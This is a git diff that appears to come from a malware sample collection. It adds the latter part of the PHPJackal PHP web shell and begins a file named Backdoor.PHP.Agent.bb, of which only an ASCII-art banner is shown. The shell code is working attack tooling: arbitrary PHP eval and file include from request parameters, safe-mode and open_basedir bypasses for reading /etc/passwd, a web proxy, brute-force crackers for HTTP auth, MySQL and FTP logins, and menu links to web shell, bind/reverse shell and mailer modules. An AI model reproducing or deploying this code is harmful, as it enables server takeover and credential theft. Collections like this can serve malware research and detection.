"\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>"; +if (!empty($_REQUEST['urL'])){ +$dir=""; +$u=parse_url($_REQUEST['urL']); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/'))); +$url=@fsockopen($host, 80, $errno, $errstr, 12); +if(!$url)die("<br>$errorbox Can not connect to host!$et$footer"); +fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +while(!feof($url)){ +$con = fgets($url); +$con = str_replace("href=mailto","HrEf=mailto",$con); +$con = str_replace("HREF=mailto","HrEf=mailto",$con); +$con = str_replace("href=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con); +$con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con); +$con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +$con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con); +echo $con; +} +fclose($url); +} +} +function mysqlclienT(){ +global $t,$errorbox,$et,$hcwd; +if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ +$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; +if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB']; +$link = @mysql_connect($server,$user,$pass); +if($link){ +if (!empty($db))mysql_select_db($db); +$result=mysql_query($query,$link); +echo "${t}Query result(s):$et"; +echo "<font color=blue><pre>"; +while($data=mysql_fetch_row($result)){ +foreach($data as $v) { +echo $v; +echo "\t"; +} +echo "\n"; +} +echo "</pre></font>"; +mysql_close($link); +} +else{ +echo "$errorbox Login failed!$et<br>"; +} +} +echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>"; +} +function phpevaL(){ +global $t,$hcwd; +if (!empty($_REQUEST['code'])){ +echo "<center><textarea rows=\"10\" cols=\"64\">"; +$code = str_replace("<?php","",$_REQUEST['code']); +$code = str_replace("<?","",$code); +$code = str_replace("?>","",$code); +htmlspecialchars(eval($code)); +echo "</textarea></center><br>"; +} +echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>"; +} +function whoiS(){ +global $t,$hcwd; +if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){ +$server =$_REQUEST['server']; +$domain=$_REQUEST['domain']."\r\n"; +$ser=fsockopen($server,43,$en,$es,5); +fputs($ser,$domain); +echo "<pre>"; +while(!feof($ser))echo fgets($ser); +echo "</pre>"; +fclose($ser); +} +else{ +echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>"; +} +} +function hexvieW(){ +if (!empty($_REQUEST['filE'])){ +$f = $_REQUEST['filE']; +echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>"; +$file = fopen($f,"r"); +$i= -1; +while (!feof($file)) { +$ln=''; +$i++; +echo "<tr><td width=\"10%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>"; +echo "<td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=0;$j<=7;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"25%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +for ($j=7;$j<=14;$j++){ +if (!feof($file)){ +$tmp = strtoupper(dechex(ord(fgetc($file)))); +if (strlen($tmp)==1) $tmp = "0".$tmp; +echo $tmp." "; +$ln.=$tmp; +} +} +echo "</td><td width=\"40%\" bgcolor=\"#"; +if ($i % 2==0) echo "666666";else echo "808080"; +echo "\">"; +$n=0;$asc="";$co=0; +for ($k=0;$k<=16;$k++){ +$co=hexdec(substr($ln,$n,2)); +if (($co<=31)||(($co>=127)&&($co<=160)))$co=46; +$asc.= chr($co); +$n+=2; +} +echo htmlspecialchars($asc); +echo "</td></tr>"; +} +} +fclose($file); +echo "</table>"; +} +function safemodE(){ +global $windows,$t,$hcwd; +if (!empty($_REQUEST['file'])){ +$i=1; +echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n"; +ini_restore("safe_mode");ini_restore("open_basedir"); +$tmp = file_get_contents($_REQUEST['file']); +echo $tmp; +$i++; +echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n"; +$tmp=tempnam("","cx"); +copy("compress.zlib://".$_REQUEST['file'], $tmp); +$fh = fopen($tmp, "r"); +$data = fread($fh, filesize($tmp)); +fclose($fh); +echo $data; +$i++; +if(function_exists("curl_init")){ +echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n"; +$fh = @curl_init("file://".$_REQUEST['file'].""); +$tmp = @curl_exec($fh); +echo $tmp; +$i++; +echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n"; +$i++; +if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR)) +$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__); +else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); +} +if($_REQUEST['file'] == "/etc/passwd"){ +echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n"; +for($uid=0;$uid<99999;$uid++){ +$h=posix_getpwuid($uid); +if (!empty($h))foreach($h as $v)echo "$v:";}} +$i++; +echo "</pre></font>"; +} +echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>"; +} +function crackeR(){ +global $et; +$cwd = getcwd(); +echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>"; +} +function dicmakeR(){ +global $errorbox,$windows,$footer,$t,$et,$hcwd; +if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0; +if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){ +$min = $_REQUEST['min']; +$max = $_REQUEST['max']; +if($max<$min)die($errorbox ."Bad input!$et". $footer); +$s =$w=""; +$out = $_REQUEST['output']; +$r = ($_REQUEST['range']=='a' )?'a':'A'; +if ($_REQUEST['range']==0) $r=0; +for($i=0;$i<$min;$i++) $s.=$r; +$dic = fopen($out,'a'); +if(is_nan($r)){ +while(strlen($s)<=$max){ +$w = $s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +else{ +while(strlen($w)<=$max){ +$w =(string)str_repeat("0",($min - strlen($s))).$s; +if($combo)$w="$w:$w"; +fwrite($dic,$w."\n"); +$s++;} +} +fclose($dic); +echo "<font color=blue>Done</font>"; +} +if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){ +$input=fopen($_REQUEST['input'],'r'); +if (!$input){ +if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +else{ +$input=explode("\n",shelL("cat $input")); +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +foreach ($input as $in){ +$user = $in; +$user = trim(fgets($in)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +} +} +else{ +$output=fopen($_REQUEST['output'],'w'); +if ($output){ +while (!feof($input)){ +$user = trim(fgets($input)," \n\r"); +if (!strstr($user,":"))continue; +$user=substr($user,0,(strpos($user,':'))); +if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n"); +} +fclose($input);fclose($output); +echo "<font color=blue>Done</font>"; +} +else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>"; +} +}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){ +$res=downloadiT($_REQUEST['url'],$_REQUEST['output']); +if($combo && $res){ +$file=file($_REQUEST['output']); +$output=fopen($_REQUEST['output'],'w'); +foreach ($file as $v)fwrite($output,"$v:$v\n"); +fclose($output); +} +echo "<font color=blue>Done</font>"; +}else{ +$temp=whereistmP(); +echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";} +} +function calC(){ +global $t,$et,$hcwd; +$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode'); +if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){ +echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">"; +if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i}))); +echo "</textarea>$et</center><br>"; +} +echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>"; +} +function authcrackeR(){ +global $errorbox,$et,$t,$crack,$hcwd; +if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$data=''; +$method=($_REQUEST['method'])?'POST':'GET'; +if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));} +spliturL($_REQUEST['target'],$host,$page); +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +if($method='GET')$page.=$data; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +echo "<font color=blue>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$so=fsockopen($host,80,$en,$es,5); +if(!$so){echo "$errorbox Can not connect to host$et";break;} +else{ +$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass"); +if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data); +$packet.="\r\n\r\n"; +$packet.=$data; +fputs($so,$packet); +$res=substr(fgets($so),9,2); +fclose($so); +if($res=='20')echo "U: $user P: $pass</br>"; +flusheR(); +} +} +echo "Done!</font>"; +}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +} +function sqlcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("mysql_connect")){ +echo "$errorbox Server does n`t support MySQL$et"; +} +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +$sql=@mysql_connect($target,$user,$pass); +if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;} +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else{ +echo "<center>${t}MySQL cracker:$crack"; +} +} +} +function ftpcrackeR(){ +global $errorbox,$t,$et,$crack; +if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et"; +else{ +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$type=$_REQUEST['combo']; +$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>"; +while(!feof($dictionary)){ +if($type){ +$combo=trim(fgets($dictionary)," \n\r"); +$user=substr($combo,0,strpos($combo,':')); +$pass=substr($combo,strpos($combo,':')+1); +}else{ +$pass=trim(fgets($dictionary)," \n\r"); +} +if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;} +if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;} +ftp_close($ftp); +flusheR(); +} +echo "<br>Done</font>"; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} +else echo "<center>${t}FTP cracker:$crack"; +}} +function openiT($name){ +$ext=strtolower(substr($name,strrpos($name,'.')+1)); +$src=array('php','php3','php4','phps','phtml','phtm','inc'); +if(in_array($ext,$src))highlight_file($name); +else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>"; +} +function logouT(){ +setcookie('passw','',time()-10000); +header('Location: '.hlinK()); +} +?> +<html> +<head> +<style>body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style> +<meta http-equiv="Content-Language" content="en-us"> +<title>PHPJackal</title> +</head><body text="#E2E2E2" bgcolor="#C0C0C0" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC"> +<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%"> +<tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table> +<hr size=1 noshade> +<?php +if (!empty($_REQUEST['seC'])){ +switch($_REQUEST['seC']){ +case 'fm':filemanager();break; +case 'sc':scanneR();break; +case 'phpinfo': phpinfo();break; +case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']); +if (!empty($_REQUEST['Save'])){ +$filehandle= fopen($_REQUEST['file'],"w"); +fwrite($filehandle,$_REQUEST['edited']); +fclose($filehandle);} +if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR(''); +break; +case 'openit':openiT($_REQUEST['namE']);break; +case 'cr': crackeR();break; +case 'dic':dicmakeR();break; +case 'whois':whoiS();break; +case 'hex':hexvieW();break; +case 'img':showimagE($_REQUEST['filE']);break; +case 'inc':include ($_REQUEST['filE']);break; +case 'hc':hashcrackeR();break; +case 'fcr':formcrackeR();break; +case 'snmp':snmpcrackeR();break; +case 'sql':sqlcrackeR();break; +case 'auth':authcrackeR();break; +case 'pop3':pop3crackeR();break; +case 'imap':imapcrackeR();break; +case 'smtp':smtpcrackeR();break; +case 'ftp':ftpcrackeR();break; +case 'eval':phpevaL();break; +case 'px':pr0xy();break; +case 'webshell':webshelL();break; +case 'mailer':maileR();break; +case 'br':brshelL();break; +case 'asm':safemodE();break; +case 'mysql':mysqlclienT();break; +case 'calc':calC();break; +case 'sysinfo':sysinfO();break; +case 'checksum':checksuM($_REQUEST['filE']);break; +case 'logout':logouT();break; +default: echo $intro; +}}else echo $intro; +echo $footer;?></body></html> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.bb b/PHP/Backdoor.PHP.Agent.bb new file mode 100644 index 00000000..f8d96737 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.bb @@ -0,0 +1,349 @@ +<!-- +/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ +/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */ +/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */ +/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */ +/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */ +/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */ +/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */ +/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */ +/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */ +/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */ +/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */ +/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */ +/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */ +/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */ +/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */ +/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */ +/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */ +/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */ +/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */ +/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */ +/* ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */ +/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */ +/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */ +/* 